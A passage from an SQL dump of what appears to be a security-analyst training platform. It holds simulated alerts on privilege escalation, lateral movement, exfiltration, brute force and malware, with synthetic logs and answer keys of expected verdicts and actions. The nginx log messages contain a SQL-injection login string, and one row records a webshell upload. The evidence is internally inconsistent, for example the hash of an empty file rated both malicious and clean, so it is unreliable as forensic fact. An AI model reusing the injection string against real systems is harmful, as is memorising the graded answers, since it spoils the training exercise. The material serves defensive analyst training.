Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.234Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:34Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"method\\\":\\\"POST\\\",\\\"url\\\":\\\"/uploads/webshell.php\\\",\\\"http_status\\\":200,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"uploaded_file\\\":{\\\"filename\\\":\\\"webshell.php\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"},\\\"username\\\":\\\"admin_user\\\",\\\"session_id\\\":\\\"abcd1234efgh5678ijkl\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.234Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:34Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"method\\\":\\\"POST\\\",\\\"url\\\":\\\"/uploads/webshell.php\\\",\\\"http_status\\\":200,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"uploaded_file\\\":{\\\"filename\\\":\\\"webshell.php\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"},\\\"username\\\":\\\"admin_user\\\",\\\"session_id\\\":\\\"abcd1234efgh5678ijkl\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.234Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:34Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"method\\\":\\\"POST\\\",\\\"url\\\":\\\"/uploads/webshell.php\\\",\\\"http_status\\\":200,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"uploaded_file\\\":{\\\"filename\\\":\\\"webshell.php\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"},\\\"username\\\":\\\"admin_user\\\",\\\"session_id\\\":\\\"abcd1234efgh5678ijkl\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.234Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:34Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"method\\\":\\\"POST\\\",\\\"url\\\":\\\"/uploads/webshell.php\\\",\\\"http_status\\\":200,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"uploaded_file\\\":{\\\"filename\\\":\\\"webshell.php\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"},\\\"username\\\":\\\"admin_user\\\",\\\"session_id\\\":\\\"abcd1234efgh5678ijkl\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.234Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:34Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"method\\\":\\\"POST\\\",\\\"url\\\":\\\"/uploads/webshell.php\\\",\\\"http_status\\\":200,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"uploaded_file\\\":{\\\"filename\\\":\\\"webshell.php\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"},\\\"username\\\":\\\"admin_user\\\",\\\"session_id\\\":\\\"abcd1234efgh5678ijkl\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(598, 'Privilege Escalation via CVE-2021-34523', 'high', 'Event logs and security logs', 'An attacker exploited CVE-2021-34523 to escalate privileges on the server, potentially allowing persistent access. The attacker used a crafted exploit to gain elevated privileges, moving from a standard user account to an administrative account. This action solidifies their foothold within the network, facilitating further malicious activities.', 'Persistence', 'T1068: Exploitation for Privilege Escalation', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:00Z\",\"event_id\":4624,\"event_source\":\"Microsoft-Windows-Security-Auditing\",\"event_type\":\"Logon\",\"user\":{\"target_user\":\"admin_user\",\"target_domain\":\"CORP\",\"target_logon_id\":\"0x3e7\"},\"logon_type\":2,\"logon_process\":\"User32 \",\"authentication_package\":\"Negotiate\",\"source_ip\":\"203.0.113.45\",\"source_port\":60000,\"target_ip\":\"10.0.0.25\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"vulnerability_exploited\":\"CVE-2021-34523\"}', '2026-01-08 22:15:20', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal server IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Database\",\"verdict\":\"suspicious\",\"details\":\"Hash observed in suspicious activities.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"clean\",\"details\":\"Legitimate administrative user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.235Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:00Z\\\",\\\"event_id\\\":4624,\\\"event_source\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"event_type\\\":\\\"Logon\\\",\\\"user\\\":{\\\"target_user\\\":\\\"admin_user\\\",\\\"target_domain\\\":\\\"CORP\\\",\\\"target_logon_id\\\":\\\"0x3e7\\\"},\\\"logon_type\\\":2,\\\"logon_process\\\":\\\"User32 \\\",\\\"authentication_package\\\":\\\"Negotiate\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"source_port\\\":60000,\\\"target_ip\\\":\\\"10.0.0.25\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"vulnerability_exploited\\\":\\\"CVE-2021-34523\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.235Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:00Z\\\",\\\"event_id\\\":4624,\\\"event_source\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"event_type\\\":\\\"Logon\\\",\\\"user\\\":{\\\"target_user\\\":\\\"admin_user\\\",\\\"target_domain\\\":\\\"CORP\\\",\\\"target_logon_id\\\":\\\"0x3e7\\\"},\\\"logon_type\\\":2,\\\"logon_process\\\":\\\"User32 \\\",\\\"authentication_package\\\":\\\"Negotiate\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"source_port\\\":60000,\\\"target_ip\\\":\\\"10.0.0.25\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"vulnerability_exploited\\\":\\\"CVE-2021-34523\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.235Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:00Z\\\",\\\"event_id\\\":4624,\\\"event_source\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"event_type\\\":\\\"Logon\\\",\\\"user\\\":{\\\"target_user\\\":\\\"admin_user\\\",\\\"target_domain\\\":\\\"CORP\\\",\\\"target_logon_id\\\":\\\"0x3e7\\\"},\\\"logon_type\\\":2,\\\"logon_process\\\":\\\"User32 \\\",\\\"authentication_package\\\":\\\"Negotiate\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"source_port\\\":60000,\\\"target_ip\\\":\\\"10.0.0.25\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"vulnerability_exploited\\\":\\\"CVE-2021-34523\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.235Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:00Z\\\",\\\"event_id\\\":4624,\\\"event_source\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"event_type\\\":\\\"Logon\\\",\\\"user\\\":{\\\"target_user\\\":\\\"admin_user\\\",\\\"target_domain\\\":\\\"CORP\\\",\\\"target_logon_id\\\":\\\"0x3e7\\\"},\\\"logon_type\\\":2,\\\"logon_process\\\":\\\"User32 \\\",\\\"authentication_package\\\":\\\"Negotiate\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"source_port\\\":60000,\\\"target_ip\\\":\\\"10.0.0.25\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"vulnerability_exploited\\\":\\\"CVE-2021-34523\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.235Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:00Z\\\",\\\"event_id\\\":4624,\\\"event_source\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"event_type\\\":\\\"Logon\\\",\\\"user\\\":{\\\"target_user\\\":\\\"admin_user\\\",\\\"target_domain\\\":\\\"CORP\\\",\\\"target_logon_id\\\":\\\"0x3e7\\\"},\\\"logon_type\\\":2,\\\"logon_process\\\":\\\"User32 \\\",\\\"authentication_package\\\":\\\"Negotiate\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"source_port\\\":60000,\\\"target_ip\\\":\\\"10.0.0.25\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"vulnerability_exploited\\\":\\\"CVE-2021-34523\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(599, 'Lateral Movement Detected in Network', 'high', 'Network traffic analysis', 'The attackers are moving laterally through the network, using compromised credentials and exploiting trust relationships to access additional systems.', 'Lateral Movement', 'T1071.001 - Application Layer Protocol: Web Protocols', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T14:23:45Z\",\"event_id\":\"LM-0456\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"192.168.1.50\",\"attacker_ip\":\"203.0.113.45\",\"compromised_user\":\"jdoe\",\"malware_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"file_name\":\"network.exe\",\"protocol\":\"HTTP\",\"action\":\"Successful Login\",\"description\":\"User jdoe from IP 192.168.1.25 accessed 192.168.1.50 using compromised credentials. Network traffic analysis reveals communication with external IP 203.0.113.45 and transfer of suspicious file network.exe with hash 5d41402abc4b2a76b9719d911017c592.\"}', '2026-01-08 22:15:20', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Common internal IP used by workstation.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"IP of target workstation within internal network.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT activity.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"User account used in unauthorized access attempt.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to known malware used for lateral movement.\"}},{\"id\":\"artifact_6\",\"type\":\"filename\",\"value\":\"network.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"File identified as malware used for spreading within the network.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(600, 'Data Exfiltration via Unusual Channels', 'high', 'Data loss prevention logs', 'Sensitive data was exfiltrated using encrypted channels, indicating a potential ransom demand or further exploitation. The data was sent to an external IP known for malicious activities. The file \'customer_data_backup.zip\' was detected leaving the network from an internal host using unusual ports.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T03:24:00Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.54\",\"protocol\":\"HTTPS\",\"port\":443,\"filename\":\"customer_data_backup.zip\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user\":\"jdoe\",\"event\":\"data_exfiltration_attempt\",\"encryption\":\"TLS\",\"alert_id\":\"EXFIL-12345\"}', '2026-01-08 22:15:20', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host used for data exfiltration.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.54\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with data theft.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"customer_data_backup.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Data Loss Prevention System\",\"verdict\":\"suspicious\",\"details\":\"Unusual file transfer detected.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No known malicious activity associated with this hash.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.238Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:24:00Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.54\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"port\\\":443,\\\"filename\\\":\\\"customer_data_backup.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"event\\\":\\\"data_exfiltration_attempt\\\",\\\"encryption\\\":\\\"TLS\\\",\\\"alert_id\\\":\\\"EXFIL-12345\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.238Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:24:00Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.54\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"port\\\":443,\\\"filename\\\":\\\"customer_data_backup.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"event\\\":\\\"data_exfiltration_attempt\\\",\\\"encryption\\\":\\\"TLS\\\",\\\"alert_id\\\":\\\"EXFIL-12345\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.238Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:24:00Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.54\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"port\\\":443,\\\"filename\\\":\\\"customer_data_backup.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"event\\\":\\\"data_exfiltration_attempt\\\",\\\"encryption\\\":\\\"TLS\\\",\\\"alert_id\\\":\\\"EXFIL-12345\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.238Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:24:00Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.54\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"port\\\":443,\\\"filename\\\":\\\"customer_data_backup.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"event\\\":\\\"data_exfiltration_attempt\\\",\\\"encryption\\\":\\\"TLS\\\",\\\"alert_id\\\":\\\"EXFIL-12345\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.238Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:24:00Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.54\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"port\\\":443,\\\"filename\\\":\\\"customer_data_backup.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"event\\\":\\\"data_exfiltration_attempt\\\",\\\"encryption\\\":\\\"TLS\\\",\\\"alert_id\\\":\\\"EXFIL-12345\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(601, 'Brute Force Attack Detected on Corporate Server', 'high', 'Splunk', 'Multiple failed login attempts detected from a suspicious foreign IP address targeting the corporate server. This indicates a possible brute force attack.', 'Brute Force', 'T1110', 0, 'Closed', 225, '{\"timestamp\":\"2026-01-11T08:30:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"45.67.89.123\",\"dst_ip\":\"192.168.1.10\",\"username\":\"admin\",\"hostname\":\"corp-server-01\",\"failed_attempts\":34}', '2026-01-11 14:04:23', '2026-03-07 11:50:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"45.67.89.123\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The high number of failed login attempts from a known malicious IP strongly indicates a brute force attempt.\"}', 'Novice', 'SIEM', 1, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.239Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"45.67.89.123\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"corp-server-01\\\",\\\"failed_attempts\\\":34}\"},{\"timestamp\":\"2026-02-01T20:31:22.239Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"45.67.89.123\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"corp-server-01\\\",\\\"failed_attempts\\\":34}\"},{\"timestamp\":\"2026-02-01T20:30:22.239Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"45.67.89.123\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"corp-server-01\\\",\\\"failed_attempts\\\":34}\"},{\"timestamp\":\"2026-02-01T20:29:22.239Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"45.67.89.123\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"corp-server-01\\\",\\\"failed_attempts\\\":34}\"},{\"timestamp\":\"2026-02-01T20:28:22.239Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"45.67.89.123\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"corp-server-01\\\",\\\"failed_attempts\\\":34}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(602, 'Malware Detected via Suspicious Process Execution', 'critical', 'CrowdStrike', 'A known malware file was executed on a company workstation. The file hash matches a sample with widespread detection on VirusTotal.', 'Malware', 'T1059', 0, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T09:15:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.22\",\"username\":\"jdoe\",\"hostname\":\"workstation-55\",\"command_line\":\"C:\\\\malware\\\\bad.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-11 14:04:23', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash detected by 60 security vendors\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.22\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Execution of a file with a known malicious hash indicates a malware infection.\"}', 'Novice', 'EDR', 1, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc 